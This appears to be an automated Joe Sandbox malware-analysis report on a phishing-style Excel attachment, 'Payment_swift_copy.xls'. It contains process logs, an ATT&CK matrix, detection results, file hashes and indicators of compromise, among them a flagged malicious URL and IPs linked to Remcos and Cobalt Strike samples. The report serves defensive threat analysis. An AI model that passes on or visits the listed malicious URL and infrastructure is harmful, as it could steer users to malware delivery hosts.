Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Payment_swift_copy.xlsStream path 'MBD00CB2B2B/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: Payment_swift_copy.xlsStream path 'Workbook' entropy: 7.99875231323 (max. 8.0)
Source: CBD20000.0.drStream path 'MBD00CB2B2B/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: CBD20000.0.drStream path 'Workbook' entropy: 7.97851159845 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 809Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts13
Exploitation for Client Execution		1
Scripting		1
Process Injection		3
Masquerading		OS Credential Dumping1
Process Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Payment_swift_copy.xls21%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://curt.wiz.co/SEyYcvw9Ev?&timeline=adorable&female100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
curt.wiz.co.cdn.gocache.net
170.82.173.30
truefalse
    		unknown
    assets.msn.com
    		unknown
    		unknownfalse
      		high
      curt.wiz.co
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
          		high
          https://curt.wiz.co/SEyYcvw9Ev?&timeline=adorable&femalefalse
          • Avira URL Cloud: malware
          		unknown
          https://otelrules.svc.static.microsoft/rules/officeclicktorun.exe-Production-v19.bundlefalse
            		high

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            13.107.246.63
            		unknownUnited States
            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
            192.3.122.159
            		unknownUnited States
            		36352AS-COLOCROSSINGUSfalse
            170.82.173.30
            		curt.wiz.co.cdn.gocache.netBrazil
            		2664443LCLOUDINTERNETSERVICESLTDA-EPPBRfalse

            General Information

            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1575764
            Start date and time:2024-12-16 10:04:12 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 6m 13s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
            Run name:Potential for more IOCs and behavior
            Number of analysed new started processes analysed:35
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • GSI enabled (VBA)
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Payment_swift_copy.xls
            Detection:MAL
            Classification:mal76.expl.winXLS@8/39@2/3
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .xls
            • Changed system and user locale, location and keyboard layout to French - France
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Active ActiveX Object
            • Active ActiveX Object
            • Active ActiveX Object
            • Active ActiveX Object
            • Scroll down
            • Close Viewer

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 52.109.76.240, 104.126.37.9, 104.126.36.248, 52.113.194.132, 52.111.236.73, 52.109.124.141, 20.50.201.201, 104.126.37.192, 104.126.37.195, 104.126.37.194, 104.126.37.209, 104.126.36.40, 104.126.37.211, 104.126.36.41, 104.126.37.208, 104.126.37.200, 184.30.24.41, 20.189.173.27, 4.175.87.197, 20.190.177.83, 20.223.35.26, 20.199.58.43
            • Excluded domains from analysis (whitelisted): e1324.dscd.akamaiedge.net, odc.officeapps.live.com, slscr.update.microsoft.com, onedscolprdweu07.westeurope.cloudapp.azure.com, tse1.mm.bing.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, osiprod-sea-bronze-azsc-000.southeastasia.cloudapp.azure.com, login.live.com, otelrules.svc.static.microsoft, onedscolprdwus21.westus.cloudapp.azure.com, officeclient.microsoft.com, asia.odcsm1.live.com.akadns.net, e28578.d.akamaiedge.net, res-1-tls.cdn.office.net, enrichment.osi.office.net, e40491.dscg.akamaiedge.net, ecs.office.com, assets.msn.com.edgekey.net, prod.configsvc1.live.com.akadns.net, fd.api.iris.microsoft.com, uci.cdn.office.net, ctldl.windowsupdate.com, sea-azsc-000.odc.officeapps.live.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, res-prod.trafficmanager.net, owamail.public.cdn.office.net.edgekey.net, s-0005.s-msedge.net, config.officeapps.live.com, res.public.onecdn.static.micros
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadFile calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            • Report size getting too big, too many NtSetValueKey calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • VT rate limit hit for: Payment_swift_copy.xls

            Simulations

            Behavior and APIs

            TimeTypeDescription
            04:06:25API Interceptor927x Sleep call for process: splwow64.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            13.107.246.63Contract Proposal Documents.pdfGet hashmaliciousUnknownBrowse
            • assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/645a21a8-32ac-ef11-b8e8-6045bd0f229c
            192.3.122.159givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
            • 192.3.122.159/47/entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor.tIF
            clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
            • 192.3.122.159/121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIF
            170.82.173.30eQcKjYOV30.exeGet hashmaliciousPushdoBrowse
            • www.mqs.com.br/
            file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
            • www.mqs.com.br/
            file.exeGet hashmaliciousPushdo, SmokeLoaderBrowse
            • www.mqs.com.br/
            file.exeGet hashmaliciousPushdo, SmokeLoaderBrowse
            • www.mqs.com.br/
            0fmEh2zmDj.exeGet hashmaliciousPushdoBrowse
            • www.mqs.com.br/

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            curt.wiz.co.cdn.gocache.netStatement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
            • 170.82.174.30
            NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
            • 170.82.173.30
            Inquiry_0476452.xlsGet hashmaliciousRemcosBrowse
            • 170.82.174.30

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            AS-COLOCROSSINGUSStatement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
            • 23.95.235.29
            givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
            • 192.3.122.159
            clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
            • 192.3.122.159
            sh4.elfGet hashmaliciousUnknownBrowse
            • 107.172.24.189
            requests-pdf.exeGet hashmaliciousRemcosBrowse
            • 198.23.227.212
            NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
            • 23.95.235.29
            jOlYP2b2P4.elfGet hashmaliciousXmrigBrowse
            • 107.172.43.186
            smb.ps1Get hashmaliciousXmrigBrowse
            • 107.172.43.186
            AI7f43Z7AC.exeGet hashmaliciousUnknownBrowse
            • 107.172.88.151
            MICROSOFT-CORP-MSN-AS-BLOCKUShttps://cavotec-au.sharefile.com/public/share/web-1271a93971714a91Get hashmaliciousHTMLPhisherBrowse
            • 52.108.186.5
            attachment.emlGet hashmaliciousUnknownBrowse
            • 52.109.68.129
            arm5.elfGet hashmaliciousUnknownBrowse
            • 21.103.49.15
            arm.elfGet hashmaliciousUnknownBrowse
            • 52.182.137.67
            sh4.elfGet hashmaliciousUnknownBrowse
            • 13.95.41.206
            ppc.elfGet hashmaliciousUnknownBrowse
            • 40.70.164.136
            mips.elfGet hashmaliciousUnknownBrowse
            • 52.121.36.55
            arm6.elfGet hashmaliciousUnknownBrowse
            • 40.122.203.222
            m68k.elfGet hashmaliciousUnknownBrowse
            • 52.186.170.135
            arm7.elfGet hashmaliciousUnknownBrowse
            • 22.32.74.84

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):118
            Entropy (8bit):3.5700810731231707
            Encrypted:false
            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
            MD5:573220372DA4ED487441611079B623CD
            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
            Malicious:false
            Reputation:high, very likely benign file
            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

            C:\Users\user\AppData\Local\Microsoft\Excel\Metadata

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:JSON data
            Category:dropped
            Size (bytes):6469
            Entropy (8bit):5.328754972255714
            Encrypted:false
            SSDEEP:96:WctuNOYd9Dq8SCE0oMctcAN/NSZDecUdBBn010nX:huU/VrcAdNPdBBn010X
            MD5:E7182175D0E4FF09C53CDA6183228B4C
            SHA1:192F2B770F747022A9F4057DFD27281237AE7FBA
            SHA-256:E0CBF3738FBF376FD8876603A45FCFACB58FE68A47B34680CB9BE643ABBA26C7
            SHA-512:8EAACB41F243578B022454D3C2D67F4890DD5721EE86F77EB55BED3C55E398DFE399338D383C600FF0BC518B48F33D8B4242A396C0768921119F77D31471B502
            Malicious:false
            Reputation:low
            Preview:{"Domains":[{"Id":268435456,"Name":"Stocks","FontLocator":"FinanceRibbon","CreateBatchSize":54,"RefreshBatchSize":200,"MaxTopBottomContextCellRows":2,"MaxLeftRightContextCellColumns":1,"SupportedMarkets":["en-GB","en-US","fr-FR"],"SupportedMarketsDisplayLanguage":["English","English","French"],"DataProvider":"Bing","Subdomains":[{"Id":268435457,"Name":"Stock","FontLocator":"Finance"},{"Id":268435458,"Name":"Bond","FontLocator":"Finance"},{"Id":268435459,"Name":"ETF","FontLocator":"Finance"},{"Id":268435460,"Name":"Index","FontLocator":"Finance"},{"Id":268435461,"Name":"MutualFund","FontLocator":"Finance"},{"Id":268435462,"Name":"Currency","FontLocator":"Finance"},{"Id":268435463,"Name":"Stock History","FontLocator":"Finance"},{"Id":268435464,"Name":"Future","FontLocator":"Finance"}],"IsTelemetry":false,"CellConfig":{"DisplayText":"UniqueName","ReadOnly":true},"EntityCardConfig":{"Title":"Name","Footer":"TBD","HeroImage":"Image","PrimaryFallbackList":["Name"],"SecondaryFallbackList":["P

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\14D171B.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):134544
            Entropy (8bit):2.9527588414114754
            Encrypted:false
            SSDEEP:768:P0WYNNkN2HtS1u40TiTKAvGNLnvfKx4t1cEU9W3V/DOEsx:pYN/Ni0TiTKeYjfKx4tCEU9W35psx
            MD5:83F48FDD46D3424E92E24E709EAB5960
            SHA1:6CEE65663B48B56BDFF6756C38C1F4190EAC6E12
            SHA-256:77F4BCE7FBE1E2F98A04DC51994467460B255135535CDE954EEE8180F500C6AE
            SHA-512:8F781049001FC063EDB9B4352C0EA05D8DA9DCFC599234A58258C6FB4C4CED2B862A701081F10B68E286124413AD04F4AAAB485D376B0A2FB04167AFF121F47E
            Malicious:false
            Reputation:low
            Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n........................................................@...............8/....X.....8/........................X...................N.8/@....y8/.....m8/|...............|.....................8/.................8/

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2B655A86.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):152108
            Entropy (8bit):2.360059885403749
            Encrypted:false
            SSDEEP:1536:bBwEotO4tU9MBFjvSO6E/cq9N6hvkFrRSYS:aO6S
            MD5:4CA59230F9D6D09A795465252057DFD3
            SHA1:32D9768DD55104FB95291EAC1FCB34A6E4C3469D
            SHA-256:C0583BEDCCF232CF705085DC44F98818DB0CDB6674A160B6511F5AC854BCA8EB
            SHA-512:9118B0D17805A452374530CD51AB9D7775960CE3765884648721526EF8B577BF21955BC8FA577E4983D0B6E1FCD1A50DD35CC04204354F78F8CC4C4B3DDAA126
            Malicious:false
            Preview:....l...........................Z....G.. EMF....,R..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................................................................................................

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\37A42BC5.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):8084
            Entropy (8bit):2.5551694039574895
            Encrypted:false
            SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
            MD5:721E8AAC81F0A6D4659831CB8194D668
            SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
            SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
            SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
            Malicious:false
            Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................

            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3BD463B8.emf

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):149960
            Entropy (8bit):2.3635032143046404
            Encrypted:false
            SSDEEP:1536:ZHL1zttZQJYAkQDnGvVf1oLJknhmUI/FZKU:ffTU
            MD5:BE236B9EAA6807F18F8CEA449B2A1F99
            SHA1:B6210B972A2BBD0F064FB3C6445E2C6A51CAD047
            SHA-256:620D4E357AD4BA7B8C1259DA8CBBFB92C62698DE614806541E470C7ADE620033
            SHA-512:7D678B11CA39C48149DB66CF4C758808F99C190926F74EF293D24365F5D3817553C5E302C1422E6697B6E98E3B193BE24B4C8177A0D01EC04F1E357EAE73AD59
            Malicious:false
